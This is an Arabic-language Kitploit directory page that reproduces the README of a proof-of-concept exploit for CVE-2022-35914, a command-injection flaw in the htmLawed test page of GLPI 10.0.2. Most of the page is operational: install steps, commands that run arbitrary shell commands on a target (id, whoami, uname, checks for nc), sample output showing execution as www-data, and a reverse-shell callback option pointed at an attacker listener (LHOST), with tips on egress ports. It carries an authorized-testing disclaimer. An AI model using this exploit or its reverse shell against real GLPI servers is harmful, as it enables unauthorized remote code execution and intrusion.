Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-35914-RCE — استغلال PoC لـ CVE-2022-35914 — حقن أوامر htmLawed في GLPI v.10.0.2، وتنفيذ أوامر، ودعم الصدفة العكسية. | Kitploit
أدوات/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
الاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

استغلال PoC لـ CVE-2022-35914 — حقن أوامر htmLawed في GLPI v.10.0.2، وتنفيذ أوامر، ودعم الصدفة العكسية.

عرض المستودع
منذ 9 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-35914 بواسطة cyb3rk0ala

PoC لـ CVE-2022-35914، وهي ثغرة حقن أوامر تتعلق بمكوّن اختبار htmLawed في تثبيتات GLPI القابلة للاستغلال.

توفر الأداة تنفيذ الأوامر عبر نقطة النهاية القابلة للاستغلال وتتضمن وظيفة رد اتصال اختيارية لبيئات المختبرات المصرح بها.

إخلاء مسؤولية: هذا المشروع مخصص فقط لاختبارات الأمان المصرح بها، ومسابقات CTF، ومختبرات OffSec/PG، والأغراض التعليمية. لا تستخدمه ضد أنظمة دون إذن صريح.


الثغرة

الحقلالتفاصيل
CVECVE-2022-35914
البرنامجGLPI
المكوّنhtmLawed
نقطة النهاية القابلة للاستغلال/vendor/htmlawed/htmlawed/htmLawedTest.php

يمكن أن يسمح المكوّن القابل للاستغلال بتنفيذ الأوامر عبر معاملات مُصمّمة خصيصًا على التثبيتات المتأثرة.


الميزات

  • تنفيذ الأوامر
  • بناء عنوان الهدف تلقائيًا
  • منفذ HTTP للهدف قابل للتكوين
  • استرجاع الجلسة/الرمز تلقائيًا
  • استخراج مخرجات الأوامر
  • فحص الهدف
  • دعم وكيل مستخدم مخصص
  • إعداد رد اتصال اختياري
  • إخراج طرفية ملوّن
  • واجهة سطر أوامر Python 3

المتطلبات

Python 3 والاعتماديات المطلوبة.

Kali Linux

root@kitploit:~
sudo apt install python3-requests python3-bs4

البيئة الافتراضية

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

التثبيت

استنسخ المستودع:

root@kitploit:~
git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

اجعل السكربت قابلًا للتنفيذ:

root@kitploit:~
chmod +x glpi.py

الاستخدام

المساعدة

root@kitploit:~
python3 glpi.py -h

تنفيذ الأوامر الأساسي

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

مثال على المخرجات:

root@kitploit:~
[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

تنفيذ الأوامر

يحدد الخيار -c الأمر المراد تنفيذه.

المستخدم الحالي

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'whoami'

الصلاحيات الحالية

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

نظام التشغيل

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'uname -a'

الأدوات المتاحة

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

الخيارات


منفذ الهدف

يحدد الخيار -p / --rport المنفذ الذي تعمل عليه خدمة الويب GLPI القابلة للاستغلال.

الافتراضي:

root@kitploit:~
80

مثال:

root@kitploit:~
python3 glpi.py -u TARGET_IP -p 80 -c 'id'

فحص الهدف

استخدم --check للتحقق من أن صفحة اختبار htmLawed متاحة دون تنفيذ أمر:

root@kitploit:~
python3 glpi.py -u TARGET_IP --check

وكيل المستخدم المخصص

يمكن توفير وكيل مستخدم HTTP مخصص باستخدام:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

الصدفة العكسية

يدعم السكربت معاملات رد اتصال اختيارية:

root@kitploit:~
-l   Callback/listener IP
-lp  Callback/listener port

مثال:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

في هذا المثال:

root@kitploit:~
Target:   TARGET_IP:80
Callback: LHOST:80

المنفذان لهما غرضان مختلفان:

root@kitploit:~
-p   = Target GLPI HTTP port
-lp  = Callback/listener port

ملاحظة مختبر OffSec

أثناء الاختبار في بيئة مختبر OffSec، عمل رد الاتصال بنجاح عبر منفذ TCP 80.

قد تنتهي مهلة منافذ رد الاتصال الأخرى، مثل 4444، اعتمادًا على شبكة المختبر وتصفية الحركة الصادرة.

بالنسبة للبيئة التي تم اختبارها:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

تم تكوين المستمع على واجهة Kali VPN باستخدام منفذ TCP 80.

مهم: استخدام المنفذ 80 لرد الاتصال هو ملاحظة خاصة بالبيئة. وليس شرطًا من متطلبات CVE-2022-35914.


استكشاف الأخطاء وإصلاحها

تنفيذ الأوامر يعمل لكن رد الاتصال لا يعمل

أولاً تحقق من تنفيذ الأوامر:

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

تحقق من وجود الأدوات المطلوبة:

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

إذا كان تنفيذ الأوامر يعمل لكن مهلة رد الاتصال انتهت، تحقق من توجيه VPN ومنفذ رد الاتصال.


تبدو مخرجات الأوامر غير صحيحة

إذا فشل تحليل مخرجات الأوامر، يتم حفظ استجابة HTTP الكاملة في:

root@kitploit:~
/tmp/glpi.html

افحصها باستخدام:

root@kitploit:~
less /tmp/glpi.html

أو:

root@kitploit:~
mousepad /tmp/glpi.html

مثال على سير العمل

1. فحص الهدف

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    --check

2. تأكيد تنفيذ الأوامر

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. تحديد المستخدم الحالي

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. التحقق من الأدوات المتاحة

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. إعداد رد الاتصال

بالنسبة لبيئة مختبر OffSec التي تم اختبارها:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

إخلاء المسؤولية

تم توفير هذا المشروع للأغراض التعليمية واختبارات الأمان المصرح بها فقط.

المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر أو وصول غير مصرح به أو نشاط غير قانوني يتعلق بهذا البرنامج.

احصل دائمًا على إذن صريح قبل اختبار أي نظام.


المؤلف

cyb3rk0ala


CVE

CVE-2022-35914


المشروع

CVE-2022-35914 بواسطة cyb3rk0ala

تنزيل الأداة
الخيارالوصفالافتراضي
-u, --urlعنوان الهدف أو عنوان IPمطلوب
-c, --cmdالأمر المراد تنفيذهid
--checkفحص الهدف دون تنفيذ أمرمعطّل
--user-agentوكيل مستخدم HTTP مخصصالافتراضي
-p, --rportمنفذ خدمة HTTP للهدف80
-l, --lhostعنوان IP لرد الاتصال/المستمع—
-lp, --lportمنفذ رد الاتصال/المستمع—